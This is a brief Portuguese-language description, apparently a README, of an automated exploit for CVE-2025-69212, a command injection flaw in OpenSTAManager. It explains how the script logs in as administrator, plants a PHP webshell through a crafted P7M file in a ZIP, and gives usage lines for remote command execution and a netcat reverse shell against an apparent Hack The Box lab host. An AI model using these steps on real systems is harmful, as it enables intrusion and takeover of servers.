
Exploit automatizado para injeção de comando CVE-2025-69212 no OpenSTAManager, com autenticação de administrador, upload de ZIP malicioso e reverse shell ou execução de comandos.
Um script de exploit totalmente automatizado para CVE-2025-69212, uma vulnerabilidade de injeção de comandos no OpenSTAManager. Este script autentica com credenciais de administrador, implanta um webshell PHP malicioso por meio de um arquivo P7M manipulado em um arquivo ZIP e fornece execução de comandos ou um reverse shell.
invoice.p7m).python3 exploit.py -u <TARGET_URL> -U <USERNAME> -P <PASSWORD> -r <LHOST> <LPORT>
Exemplos:
Executar um único comando:
python3 exploit.py -u http://support_001.enigma.htb -U admin -P 'Password123' -c 'id'
Obter um reverse shell:
# Start your netcat listener in another terminal:
nc -lvnp 4444
# Run the exploit:
python3 exploit.py -u http://support_001.enigma.htb -U admin -P 'Password123' -r 10.10.14.1 4444